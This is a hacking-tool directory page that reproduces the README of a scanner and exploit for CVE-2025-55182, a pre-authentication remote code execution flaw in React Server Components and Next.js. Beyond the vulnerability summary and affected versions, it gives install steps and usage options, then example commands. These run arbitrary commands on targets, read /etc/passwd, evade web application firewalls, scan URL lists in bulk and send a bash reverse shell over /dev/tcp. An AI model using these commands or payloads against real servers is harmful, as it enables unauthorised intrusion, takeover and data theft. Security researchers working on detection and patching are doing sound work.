Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-55182-Waf — CVE-2025-55182 RCE vulnerability in Next.js/React RSC servers (exploit and scanner) | Kitploit
Tools/GitHubGitHub/l0n3m4n/cve-2025-55182-waf
Vulnerability ScannersPayload GenerationExploitationWeb Application ExploitationWAF BypassPenetration TestingCommand and ControlRemote Access Tool
GitHubl0n3m4n/cve-2025-55182-waf

CVE-2025-55182-Waf

CVE-2025-55182 RCE vulnerability in Next.js/React RSC servers (exploit and scanner)

View Repository
21149 months agoNot yet reviewed
Website

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Next.js/React RSC Scanner & Exploit - RCE

Facebook X Medium Buy Me a Coffee ProtonMail


This tool is designed for security researchers and penetration testers to detect and exploit the CVE-2025-55182 vulnerability in Next.js/React RSC applications. It provides multiple scanning modes, exploitation features, and WAF bypass techniques.

✨ Features

  • 🎯 Multiple Scanning Modes: Choose between rce, safe, and vercel_bypass modes.
  • 💥 Easy Exploitation: Execute commands or get a reverse shell on vulnerable targets.
  • 📂 Custom Payloads: Provide custom payloads as a string or from a file.
  • 🛡️ WAF Bypass: Techniques to bypass Web Application Firewalls.
  • ⚡ Fast and Concurrent: Scans multiple targets using asyncio.
  • 📝 Verbose Output: Polished and detailed output for easy debugging.
  • 🎨 Colored Output: For better readability.
  • 🤖 Automated OS Detection: Automatically detects the target's operating system (Linux/Windows) for smarter exploitation, especially for reverse shells.

📈 Vulnerability Details

CategoryInformation
Published2025-12-03
Base Score10.0 (CRITICAL)
ResearcherLachlan Davidson (https://github.com/lachlan2k)
VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
DescriptionA critical Remote Code Execution (RCE) vulnerability in React Server Components. Applications using React’s server-side runtime including frameworks like Next.js are affected. The issue is caused by unsafe deserialization of untrusted “Flight” protocol data, allowing an attacker to achieve pre-authentication code execution on the server. Updating to patched React and framework versions is required.
EPSS Score27.81% (Probability of exploitation)
CISA KEV CatalogListed: Yes, Ransomware: Unknown
HackerOne HacktivityRank: 1, Reports: 92
Patching PriorityA+

🎯 Affected Versions

This vulnerability affects the following versions of React Server Components:

  • React Server Components: 19.0.0, 19.1.0, 19.1.1, and 19.2.0
  • Next.js versions ≥14.3.0-canary.77, all 15.x, and 16.x
  • frameworks using RSC: React Router (RSC mode), Waku, Redwood SDK, and various RSC plugins

The following packages are also affected:

  • react-server-dom-parcel
  • react-server-dom-turbopack
  • react-server-dom-webpack

🛠️ Installation

git clone https://github.com/l0n3m4n/CVE-2025-55182.git
cd CVE-2025-55182

# Create a virtual environment
python3 -m venv venv-55182
source venv-55182/bin/activate

# Install dependencies
pip install -r requirements.txt

usage

❯ python3 CVE-2025-55182.py -h

__________                      __  ________    _________.__           .__  .__   
\______   \ ____ _____    _____/  |_\_____  \  /   _____/|  |__   ____ |  | |  |  
 |       _// __ \\__  \ _/ ___\   __\/  ____/  \_____  \ |  |  \_/ __ \|  | |  |  
 |    |   \  ___/ / __ \\  \___|  | /       \  /        \|   Y  \  ___/|  |_|  |__
 |____|_  /\___  >____  /\___  >__| \_______ \/_______  /|___|  /\___  >____/____/
        \/     \/     \/     \/             \/        \/      \/     \/                              
       Author: l0n3m4n  | CVE-2025-55182 | Next.js/React RSC Scanner & Exploit 

usage: CVE-2025-55182.py [-h] (-u URL | -f FILE) [-c COMMAND] [-p PAYLOAD] [-r LHOST:LPORT] [-sm MODE]
                         [-wb] [-wbs KB] [-wbu] [-o FILE] [-t NUM] [-T SEC] [-P URL] [-H HEADER] [-v]

Powerful all-in-one tool (scan and exploit) CVE-2025-55182 in Next.js applications

options:
  -h, --help                       show this help message and exit
  -u, --url URL                    Single URL to scan or exploit.
  -f, --file FILE                  File containing a list of URLs to scan/exploit.

Exploitation Options:
  -c, --command COMMAND            Command to execute on the target(s).
  -p, --payloads PAYLOAD           Custom payload to execute on the target(s). Can be a string or a
                                   file path.
  -r, --reverse-shell LHOST:LPORT  Attempt a reverse shell.

Scanning Options:
  -sm, --scan-mode MODE            Scanning technique. Choices: {rce, safe, vercel_bypass}. (default:
                                   rce)
  -wb, --waf-bypass                Add junk data to the request to bypass WAFs.
  -wbs, --waf-bypass-size KB       Size of junk data in KB (default: 128).
  -wbu, --waf-bypass-utf16le       Use UTF-16LE encoding to bypass WAFs.

General Options:
  -o, --output FILE                File to save vulnerable URLs from scans.
  -t, --threads NUM                Number of concurrent threads (default: 10).
  -T, --timeout SEC                Request timeout in seconds (default: 10).
  -P, --proxy URL                  Proxy to use (e.g., http://127.0.0.1:8080).
  -H, --header HEADER              Add custom headers (e.g., 'Cookie: session=...').
  -v, --verbose                    Enable verbose output for success/failed/non-vulnerable checks.

🔬 Scanning Modes

  • rce (default): Active scan mode, executes an echo command to confirm the vulnerability. This is the most reliable method, but it may leave logs on the target system.
  • safe: Side-channel scan mode, does not execute commands. It checks for a specific error message (E{"digest") to determine if the target is vulnerable. This is safer than rce mode, but may be less reliable.
  • vercel_bypass: Uses a specific payload to bypass Vercel's WAF and checks for the command output in the X-Action-Redirect header.

Waf bypass different encoding techniques

credit @coffinxp7 wafbyass

🚀 Examples

Scanning

# Scan a single URL with the default rce check
python3 CVE-2025-55182.py -u http://target.com

# Scan a list of URLs with the `safe` mode and 20 threads
python3 CVE-2025-55182.py -f urls.txt -sm safe -t 20

# Scan with Vercel WAF bypass mode and save vulnerable URLs to a file
python3 CVE-2025-55182.py -f urls.txt -sm vercel_bypass -o vulnerable.txt

Exploitation

# Execute a command on a single target
python3 CVE-2025-55182.py -u http://target.com -c "cat /etc/passwd"

# Use WAF bypass techniques
python3 CVE-2025-55182.py -u http://target.com -c "whoami" -wb

# Use a custom payload string
python3 CVE-2025-55182.py -u http://target.com -p "bash -i >& /dev/tcp/LHOST/LPORT 0>&1"

# Use a custom payload from a file (windows target)
python3 CVE-2025-55182.py -u http://target.com -p windows_revshell.sh
Download Tool